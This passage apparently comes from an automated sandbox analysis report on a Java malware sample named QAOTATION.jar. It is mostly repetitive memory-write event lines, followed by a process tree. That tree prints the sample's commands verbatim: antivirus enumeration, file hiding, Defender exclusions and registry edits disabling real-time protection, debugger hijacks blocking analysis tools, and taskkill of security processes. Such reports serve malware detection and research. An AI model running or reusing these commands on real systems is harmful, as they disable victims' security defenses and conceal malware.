PID 1588 wrote to memory of 1368 1588 java.exe 189 PID 1588 wrote to memory of 1368 1588 java.exe 189 PID 1368 wrote to memory of 564 1368 cmd.exe 190 PID 1368 wrote to memory of 564 1368 cmd.exe 190 PID 1368 wrote to memory of 564 1368 cmd.exe 190 PID 1368 wrote to memory of 1616 1368 cmd.exe 191 PID 1368 wrote to memory of 1616 1368 cmd.exe 191 PID 1368 wrote to memory of 1616 1368 cmd.exe 191 PID 1588 wrote to memory of 1188 1588 java.exe 192 PID 1588 wrote to memory of 1188 1588 java.exe 192 PID 1588 wrote to memory of 1188 1588 java.exe 192 PID 1188 wrote to memory of 1856 1188 cmd.exe 193 PID 1188 wrote to memory of 1856 1188 cmd.exe 193 PID 1188 wrote to memory of 1856 1188 cmd.exe 193 PID 1188 wrote to memory of 872 1188 cmd.exe 194 PID 1188 wrote to memory of 872 1188 cmd.exe 194 PID 1188 wrote to memory of 872 1188 cmd.exe 194 PID 1588 wrote to memory of 1640 1588 java.exe 195 PID 1588 wrote to memory of 1640 1588 java.exe 195 PID 1588 wrote to memory of 1640 1588 java.exe 195 PID 1640 wrote to memory of 2040 1640 cmd.exe 196 PID 1640 wrote to memory of 2040 1640 cmd.exe 196 PID 1640 wrote to memory of 2040 1640 cmd.exe 196 PID 1640 wrote to memory of 1416 1640 cmd.exe 197 PID 1640 wrote to memory of 1416 1640 cmd.exe 197 PID 1640 wrote to memory of 1416 1640 cmd.exe 197 PID 1588 wrote to memory of 1360 1588 java.exe 198 PID 1588 wrote to memory of 1360 1588 java.exe 198 PID 1588 wrote to memory of 1360 1588 java.exe 198 PID 1360 wrote to memory of 2016 1360 cmd.exe 199 PID 1360 wrote to memory of 2016 1360 cmd.exe 199 PID 1360 wrote to memory of 2016 1360 cmd.exe 199 PID 1360 wrote to memory of 1556 1360 cmd.exe 200 PID 1360 wrote to memory of 1556 1360 cmd.exe 200 PID 1360 wrote to memory of 1556 1360 cmd.exe 200 PID 1588 wrote to memory of 1764 1588 java.exe 201 PID 1588 wrote to memory of 1764 1588 java.exe 201 PID 1588 wrote to memory of 1764 1588 java.exe 201 PID 1764 wrote to memory of 316 1764 cmd.exe 202 PID 1764 wrote to memory of 316 1764 cmd.exe 202 PID 1764 wrote to memory of 316 1764 cmd.exe 202 PID 1588 wrote to memory of 1624 1588 java.exe 203 PID 1588 wrote to memory of 1624 1588 java.exe 203 PID 1588 wrote to memory of 1624 1588 java.exe 203 PID 1764 wrote to memory of 1868 1764 cmd.exe 205 PID 1764 wrote to memory of 1868 1764 cmd.exe 205 PID 1764 wrote to memory of 1868 1764 cmd.exe 205 PID 1588 wrote to memory of 560 1588 java.exe 206 PID 1588 wrote to memory of 560 1588 java.exe 206 PID 1588 wrote to memory of 560 1588 java.exe 206 PID 560 wrote to memory of 1028 560 cmd.exe 207 PID 560 wrote to memory of 1028 560 cmd.exe 207 PID 560 wrote to memory of 1028 560 cmd.exe 207 PID 560 wrote to memory of 1992 560 cmd.exe 208 PID 560 wrote to memory of 1992 560 cmd.exe 208 PID 560 wrote to memory of 1992 560 cmd.exe 208 PID 1588 wrote to memory of 1036 1588 java.exe 209 PID 1588 wrote to memory of 1036 1588 java.exe 209 PID 1588 wrote to memory of 1036 1588 java.exe 209 PID 1036 wrote to memory of 1748 1036 cmd.exe 210 PID 1036 wrote to memory of 1748 1036 cmd.exe 210 PID 1036 wrote to memory of 1748 1036 cmd.exe 210 PID 1036 wrote to memory of 856 1036 cmd.exe 211 PID 1036 wrote to memory of 856 1036 cmd.exe 211 PID 1036 wrote to memory of 856 1036 cmd.exe 211 PID 1588 wrote to memory of 620 1588 java.exe 212 PID 1588 wrote to memory of 620 1588 java.exe 212 PID 1588 wrote to memory of 620 1588 java.exe 212 PID 620 wrote to memory of 1768 620 cmd.exe 213 PID 620 wrote to memory of 1768 620 cmd.exe 213 PID 620 wrote to memory of 1768 620 cmd.exe 213 PID 620 wrote to memory of 1612 620 cmd.exe 214 PID 620 wrote to memory of 1612 620 cmd.exe 214 PID 620 wrote to memory of 1612 620 cmd.exe 214 PID 1588 wrote to memory of 1988 1588 java.exe 215 PID 1588 wrote to memory of 1988 1588 java.exe 215 PID 1588 wrote to memory of 1988 1588 java.exe 215 PID 1988 wrote to memory of 800 1988 cmd.exe 216 PID 1988 wrote to memory of 800 1988 cmd.exe 216 PID 1988 wrote to memory of 800 1988 cmd.exe 216 PID 1988 wrote to memory of 564 1988 cmd.exe 217 PID 1988 wrote to memory of 564 1988 cmd.exe 217 PID 1988 wrote to memory of 564 1988 cmd.exe 217 PID 1588 wrote to memory of 2020 1588 java.exe 218 PID 1588 wrote to memory of 2020 1588 java.exe 218 PID 1588 wrote to memory of 2020 1588 java.exe 218 PID 2020 wrote to memory of 1224 2020 cmd.exe 219 PID 2020 wrote to memory of 1224 2020 cmd.exe 219 PID 2020 wrote to memory of 1224 2020 cmd.exe 219 PID 2020 wrote to memory of 1016 2020 cmd.exe 220 PID 2020 wrote to memory of 1016 2020 cmd.exe 220 PID 2020 wrote to memory of 1016 2020 cmd.exe 220 PID 1588 wrote to memory of 1852 1588 java.exe 221 PID 1588 wrote to memory of 1852 1588 java.exe 221 PID 1588 wrote to memory of 1852 1588 java.exe 221 PID 1852 wrote to memory of 1416 1852 cmd.exe 222 PID 1852 wrote to memory of 1416 1852 cmd.exe 222 PID 1852 wrote to memory of 1416 1852 cmd.exe 222 PID 1852 wrote to memory of 2044 1852 cmd.exe 223 PID 1852 wrote to memory of 2044 1852 cmd.exe 223 PID 1852 wrote to memory of 2044 1852 cmd.exe 223 PID 1588 wrote to memory of 1496 1588 java.exe 224 PID 1588 wrote to memory of 1496 1588 java.exe 224 PID 1588 wrote to memory of 1496 1588 java.exe 224 PID 1496 wrote to memory of 1604 1496 cmd.exe 225 PID 1496 wrote to memory of 1604 1496 cmd.exe 225 PID 1496 wrote to memory of 1604 1496 cmd.exe 225 PID 1496 wrote to memory of 1904 1496 cmd.exe 226 PID 1496 wrote to memory of 1904 1496 cmd.exe 226 PID 1496 wrote to memory of 1904 1496 cmd.exe 226 PID 1588 wrote to memory of 1464 1588 java.exe 227 PID 1588 wrote to memory of 1464 1588 java.exe 227 PID 1588 wrote to memory of 1464 1588 java.exe 227 PID 1464 wrote to memory of 664 1464 cmd.exe 228 PID 1464 wrote to memory of 664 1464 cmd.exe 228 PID 1464 wrote to memory of 664 1464 cmd.exe 228 PID 1464 wrote to memory of 1576 1464 cmd.exe 229 PID 1464 wrote to memory of 1576 1464 cmd.exe 229 PID 1464 wrote to memory of 1576 1464 cmd.exe 229 PID 1588 wrote to memory of 1780 1588 java.exe 230 PID 1588 wrote to memory of 1780 1588 java.exe 230 PID 1588 wrote to memory of 1780 1588 java.exe 230 PID 1780 wrote to memory of 1848 1780 cmd.exe 231 PID 1780 wrote to memory of 1848 1780 cmd.exe 231 PID 1780 wrote to memory of 1848 1780 cmd.exe 231 PID 1780 wrote to memory of 1312 1780 cmd.exe 232 PID 1780 wrote to memory of 1312 1780 cmd.exe 232 PID 1780 wrote to memory of 1312 1780 cmd.exe 232 PID 1588 wrote to memory of 1944 1588 java.exe 233 PID 1588 wrote to memory of 1944 1588 java.exe 233 PID 1588 wrote to memory of 1944 1588 java.exe 233 PID 1944 wrote to memory of 1392 1944 cmd.exe 234 PID 1944 wrote to memory of 1392 1944 cmd.exe 234 PID 1944 wrote to memory of 1392 1944 cmd.exe 234 PID 1944 wrote to memory of 1568 1944 cmd.exe 235 PID 1944 wrote to memory of 1568 1944 cmd.exe 235 PID 1944 wrote to memory of 1568 1944 cmd.exe 235 PID 1588 wrote to memory of 1748 1588 java.exe 236 PID 1588 wrote to memory of 1748 1588 java.exe 236 PID 1588 wrote to memory of 1748 1588 java.exe 236 PID 1748 wrote to memory of 1756 1748 cmd.exe 237 PID 1748 wrote to memory of 1756 1748 cmd.exe 237 PID 1748 wrote to memory of 1756 1748 cmd.exe 237 PID 1748 wrote to memory of 2036 1748 cmd.exe 238 PID 1748 wrote to memory of 2036 1748 cmd.exe 238 PID 1748 wrote to memory of 2036 1748 cmd.exe 238 PID 1588 wrote to memory of 1612 1588 java.exe 239 PID 1588 wrote to memory of 1612 1588 java.exe 239 PID 1588 wrote to memory of 1612 1588 java.exe 239 PID 1612 wrote to memory of 2004 1612 cmd.exe 240 PID 1612 wrote to memory of 2004 1612 cmd.exe 240 PID 1612 wrote to memory of 2004 1612 cmd.exe 240 PID 1612 wrote to memory of 564 1612 cmd.exe 241 PID 1612 wrote to memory of 564 1612 cmd.exe 241 PID 1612 wrote to memory of 564 1612 cmd.exe 241 PID 1588 wrote to memory of 1856 1588 java.exe 242 PID 1588 wrote to memory of 1856 1588 java.exe 242 PID 1588 wrote to memory of 1856 1588 java.exe 242 PID 1588 wrote to memory of 584 1588 java.exe 243 PID 1588 wrote to memory of 584 1588 java.exe 243 PID 1588 wrote to memory of 584 1588 java.exe 243 PID 584 wrote to memory of 1416 584 cmd.exe 245 PID 584 wrote to memory of 1416 584 cmd.exe 245 PID 584 wrote to memory of 1416 584 cmd.exe 245 PID 584 wrote to memory of 1572 584 cmd.exe 246 PID 584 wrote to memory of 1572 584 cmd.exe 246 PID 584 wrote to memory of 1572 584 cmd.exe 246 PID 1588 wrote to memory of 1904 1588 java.exe 247 PID 1588 wrote to memory of 1904 1588 java.exe 247 PID 1588 wrote to memory of 1904 1588 java.exe 247 PID 1904 wrote to memory of 664 1904 cmd.exe 248 PID 1904 wrote to memory of 664 1904 cmd.exe 248 PID 1904 wrote to memory of 664 1904 cmd.exe 248 PID 1904 wrote to memory of 1624 1904 cmd.exe 249 PID 1904 wrote to memory of 1624 1904 cmd.exe 249 PID 1904 wrote to memory of 1624 1904 cmd.exe 249 PID 1588 wrote to memory of 1848 1588 java.exe 250 PID 1588 wrote to memory of 1848 1588 java.exe 250 PID 1588 wrote to memory of 1848 1588 java.exe 250 PID 1848 wrote to memory of 1028 1848 cmd.exe 251 PID 1848 wrote to memory of 1028 1848 cmd.exe 251 PID 1848 wrote to memory of 1028 1848 cmd.exe 251 PID 1848 wrote to memory of 1996 1848 cmd.exe 252 PID 1848 wrote to memory of 1996 1848 cmd.exe 252 PID 1848 wrote to memory of 1996 1848 cmd.exe 252 PID 1588 wrote to memory of 1568 1588 java.exe 253 PID 1588 wrote to memory of 1568 1588 java.exe 253 PID 1588 wrote to memory of 1568 1588 java.exe 253 PID 1568 wrote to memory of 1508 1568 cmd.exe 254 PID 1568 wrote to memory of 1508 1568 cmd.exe 254 PID 1568 wrote to memory of 1508 1568 cmd.exe 254 PID 1568 wrote to memory of 1768 1568 cmd.exe 255 PID 1568 wrote to memory of 1768 1568 cmd.exe 255 PID 1568 wrote to memory of 1768 1568 cmd.exe 255 PID 1588 wrote to memory of 800 1588 java.exe 256 PID 1588 wrote to memory of 800 1588 java.exe 256 PID 1588 wrote to memory of 800 1588 java.exe 256 PID 800 wrote to memory of 2004 800 cmd.exe 257 PID 800 wrote to memory of 2004 800 cmd.exe 257 PID 800 wrote to memory of 2004 800 cmd.exe 257 PID 800 wrote to memory of 1224 800 cmd.exe 258 PID 800 wrote to memory of 1224 800 cmd.exe 258 PID 800 wrote to memory of 1224 800 cmd.exe 258 PID 1588 wrote to memory of 2044 1588 java.exe 259 PID 1588 wrote to memory of 2044 1588 java.exe 259 PID 1588 wrote to memory of 2044 1588 java.exe 259 PID 2044 wrote to memory of 1416 2044 cmd.exe 260 PID 2044 wrote to memory of 1416 2044 cmd.exe 260 PID 2044 wrote to memory of 1416 2044 cmd.exe 260 PID 2044 wrote to memory of 1684 2044 cmd.exe 261 PID 2044 wrote to memory of 1684 2044 cmd.exe 261 PID 2044 wrote to memory of 1684 2044 cmd.exe 261 PID 1588 wrote to memory of 820 1588 java.exe 262 PID 1588 wrote to memory of 820 1588 java.exe 262 PID 1588 wrote to memory of 820 1588 java.exe 262 PID 820 wrote to memory of 2016 820 cmd.exe 263 PID 820 wrote to memory of 2016 820 cmd.exe 263 PID 820 wrote to memory of 2016 820 cmd.exe 263 PID 820 wrote to memory of 1480 820 cmd.exe 264 PID 820 wrote to memory of 1480 820 cmd.exe 264 PID 820 wrote to memory of 1480 820 cmd.exe 264 PID 1588 wrote to memory of 1116 1588 java.exe 265 PID 1588 wrote to memory of 1116 1588 java.exe 265 PID 1588 wrote to memory of 1116 1588 java.exe 265 PID 1116 wrote to memory of 1632 1116 cmd.exe 266 PID 1116 wrote to memory of 1632 1116 cmd.exe 266 PID 1116 wrote to memory of 1632 1116 cmd.exe 266 PID 1116 wrote to memory of 1992 1116 cmd.exe 267 PID 1116 wrote to memory of 1992 1116 cmd.exe 267 PID 1116 wrote to memory of 1992 1116 cmd.exe 267 PID 1588 wrote to memory of 1028 1588 java.exe 268 PID 1588 wrote to memory of 1028 1588 java.exe 268 PID 1588 wrote to memory of 1028 1588 java.exe 268 PID 1028 wrote to memory of 1552 1028 cmd.exe 269 PID 1028 wrote to memory of 1552 1028 cmd.exe 269 PID 1028 wrote to memory of 1552 1028 cmd.exe 269 PID 1028 wrote to memory of 1580 1028 cmd.exe 270 PID 1028 wrote to memory of 1580 1028 cmd.exe 270 PID 1028 wrote to memory of 1580 1028 cmd.exe 270 PID 1588 wrote to memory of 2036 1588 java.exe 271 PID 1588 wrote to memory of 2036 1588 java.exe 271 PID 1588 wrote to memory of 2036 1588 java.exe 271 PID 2036 wrote to memory of 432 2036 cmd.exe 272 PID 2036 wrote to memory of 432 2036 cmd.exe 272 PID 2036 wrote to memory of 432 2036 cmd.exe 272 PID 2036 wrote to memory of 1804 2036 cmd.exe 273 PID 2036 wrote to memory of 1804 2036 cmd.exe 273 PID 2036 wrote to memory of 1804 2036 cmd.exe 273 PID 1588 wrote to memory of 1224 1588 java.exe 274 PID 1588 wrote to memory of 1224 1588 java.exe 274 PID 1588 wrote to memory of 1224 1588 java.exe 274 PID 1224 wrote to memory of 1320 1224 cmd.exe 275 PID 1224 wrote to memory of 1320 1224 cmd.exe 275 PID 1224 wrote to memory of 1320 1224 cmd.exe 275 PID 1224 wrote to memory of 1576 1224 cmd.exe 276 PID 1224 wrote to memory of 1576 1224 cmd.exe 276 PID 1224 wrote to memory of 1576 1224 cmd.exe 276 PID 1588 wrote to memory of 1884 1588 java.exe 277 PID 1588 wrote to memory of 1884 1588 java.exe 277 PID 1588 wrote to memory of 1884 1588 java.exe 277 PID 1884 wrote to memory of 2016 1884 cmd.exe 278 PID 1884 wrote to memory of 2016 1884 cmd.exe 278 PID 1884 wrote to memory of 2016 1884 cmd.exe 278 PID 1884 wrote to memory of 664 1884 cmd.exe 279 PID 1884 wrote to memory of 664 1884 cmd.exe 279 PID 1884 wrote to memory of 664 1884 cmd.exe 279 PID 1588 wrote to memory of 332 1588 java.exe 280 PID 1588 wrote to memory of 332 1588 java.exe 280 PID 1588 wrote to memory of 332 1588 java.exe 280 PID 332 wrote to memory of 1992 332 cmd.exe 281 PID 332 wrote to memory of 1992 332 cmd.exe 281 PID 332 wrote to memory of 1992 332 cmd.exe 281 PID 332 wrote to memory of 1756 332 cmd.exe 282 PID 332 wrote to memory of 1756 332 cmd.exe 282 PID 332 wrote to memory of 1756 332 cmd.exe 282 PID 1588 wrote to memory of 392 1588 java.exe 283 PID 1588 wrote to memory of 392 1588 java.exe 283 PID 1588 wrote to memory of 392 1588 java.exe 283 PID 392 wrote to memory of 824 392 cmd.exe 284 PID 392 wrote to memory of 824 392 cmd.exe 284 PID 392 wrote to memory of 824 392 cmd.exe 284 PID 392 wrote to memory of 432 392 cmd.exe 285 PID 392 wrote to memory of 432 392 cmd.exe 285 PID 392 wrote to memory of 432 392 cmd.exe 285 PID 1588 wrote to memory of 1572 1588 java.exe 286 PID 1588 wrote to memory of 1572 1588 java.exe 286 PID 1588 wrote to memory of 1572 1588 java.exe 286 PID 1572 wrote to memory of 1948 1572 cmd.exe 287 PID 1572 wrote to memory of 1948 1572 cmd.exe 287 PID 1572 wrote to memory of 1948 1572 cmd.exe 287 PID 1572 wrote to memory of 1576 1572 cmd.exe 288 PID 1572 wrote to memory of 1576 1572 cmd.exe 288 PID 1572 wrote to memory of 1576 1572 cmd.exe 288 PID 1588 wrote to memory of 1856 1588 java.exe 289 PID 1588 wrote to memory of 1856 1588 java.exe 289 PID 1588 wrote to memory of 1856 1588 java.exe 289 PID 1856 wrote to memory of 1312 1856 cmd.exe 290 PID 1856 wrote to memory of 1312 1856 cmd.exe 290 PID 1856 wrote to memory of 1312 1856 cmd.exe 290 PID 1856 wrote to memory of 1564 1856 cmd.exe 291 PID 1856 wrote to memory of 1564 1856 cmd.exe 291 PID 1856 wrote to memory of 1564 1856 cmd.exe 291 PID 1588 wrote to memory of 1992 1588 java.exe 292 PID 1588 wrote to memory of 1992 1588 java.exe 292 PID 1588 wrote to memory of 1992 1588 java.exe 292 PID 1588 wrote to memory of 1772 1588 java.exe 293 PID 1588 wrote to memory of 1772 1588 java.exe 293 PID 1588 wrote to memory of 1772 1588 java.exe 293 PID 1992 wrote to memory of 432 1992 cmd.exe 295 PID 1992 wrote to memory of 432 1992 cmd.exe 295 PID 1992 wrote to memory of 432 1992 cmd.exe 295 PID 1992 wrote to memory of 1480 1992 cmd.exe 296 PID 1992 wrote to memory of 1480 1992 cmd.exe 296 PID 1992 wrote to memory of 1480 1992 cmd.exe 296 PID 1588 wrote to memory of 2024 1588 java.exe 297 PID 1588 wrote to memory of 2024 1588 java.exe 297 PID 1588 wrote to memory of 2024 1588 java.exe 297 PID 2024 wrote to memory of 1564 2024 cmd.exe 298 PID 2024 wrote to memory of 1564 2024 cmd.exe 298 PID 2024 wrote to memory of 1564 2024 cmd.exe 298 PID 2024 wrote to memory of 1932 2024 cmd.exe 299 PID 2024 wrote to memory of 1932 2024 cmd.exe 299 PID 2024 wrote to memory of 1932 2024 cmd.exe 299 PID 1588 wrote to memory of 1748 1588 java.exe 300 PID 1588 wrote to memory of 1748 1588 java.exe 300 PID 1588 wrote to memory of 1748 1588 java.exe 300 PID 1748 wrote to memory of 1616 1748 cmd.exe 301 PID 1748 wrote to memory of 1616 1748 cmd.exe 301 PID 1748 wrote to memory of 1616 1748 cmd.exe 301 PID 1748 wrote to memory of 1944 1748 cmd.exe 302 PID 1748 wrote to memory of 1944 1748 cmd.exe 302 PID 1748 wrote to memory of 1944 1748 cmd.exe 302 PID 1588 wrote to memory of 1020 1588 java.exe 303 PID 1588 wrote to memory of 1020 1588 java.exe 303 PID 1588 wrote to memory of 1020 1588 java.exe 303 PID 1020 wrote to memory of 1028 1020 cmd.exe 304 PID 1020 wrote to memory of 1028 1020 cmd.exe 304 PID 1020 wrote to memory of 1028 1020 cmd.exe 304 PID 1020 wrote to memory of 1900 1020 cmd.exe 305 PID 1020 wrote to memory of 1900 1020 cmd.exe 305 PID 1020 wrote to memory of 1900 1020 cmd.exe 305 PID 1588 wrote to memory of 1904 1588 java.exe 306 PID 1588 wrote to memory of 1904 1588 java.exe 306 PID 1588 wrote to memory of 1904 1588 java.exe 306 PID 1588 wrote to memory of 1768 1588 java.exe 308 PID 1588 wrote to memory of 1768 1588 java.exe 308 PID 1588 wrote to memory of 1768 1588 java.exe 308 PID 1588 wrote to memory of 1624 1588 java.exe 310 PID 1588 wrote to memory of 1624 1588 java.exe 310 PID 1588 wrote to memory of 1624 1588 java.exe 310 PID 1588 wrote to memory of 1940 1588 java.exe 312 PID 1588 wrote to memory of 1940 1588 java.exe 312 PID 1588 wrote to memory of 1940 1588 java.exe 312 PID 1588 wrote to memory of 1764 1588 java.exe 314 PID 1588 wrote to memory of 1764 1588 java.exe 314 PID 1588 wrote to memory of 1764 1588 java.exe 314 -
Views/modifies file attributes 1 TTPs 8 IoCs
pid Process 1640 attrib.exe 1932 attrib.exe 1584 attrib.exe 1628 attrib.exe 1664 attrib.exe 1828 attrib.exe 1820 attrib.exe 332 attrib.exe
Processes
-
C:\Windows\system32\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\QAOTATION.jar1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1588 -
C:\Windows\system32\cmd.execmd.exe2⤵PID:1516
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1692
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1224
-
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\Oracle2⤵
- Views/modifies file attributes
PID:1828
-
-
C:\Windows\system32\attrib.exeattrib +h +r +s C:\Users\Admin\.ntusernt.ini2⤵
- Views/modifies file attributes
PID:1820
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\oWsdf\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:332
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\oWsdf\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1640
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\oWsdf2⤵
- Views/modifies file attributes
PID:1932
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\oWsdf2⤵
- Views/modifies file attributes
PID:1584
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\oWsdf2⤵
- Views/modifies file attributes
PID:1628
-
-
C:\Windows\system32\attrib.exeattrib +h +s +r C:\Users\Admin\oWsdf\MIJPw.class2⤵
- Views/modifies file attributes
PID:1664
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1612 -
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:2032
-
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:1460
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\oWsdf','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\oWsdf\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1976
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:2020
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2004
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:868
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1076
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1140
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F2⤵
- Kills process with taskkill
PID:820
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1432
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1496
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1460
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1604
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1504
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1784
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1864
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:524
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1632
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1580
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1520
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2008
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1368
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F2⤵
- Kills process with taskkill
PID:1428
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:316
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2020
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1820
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:1484
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:2024
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F2⤵
- Kills process with taskkill
PID:2000
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1860
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:643⤵PID:1268
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:323⤵PID:1624
-
-
-
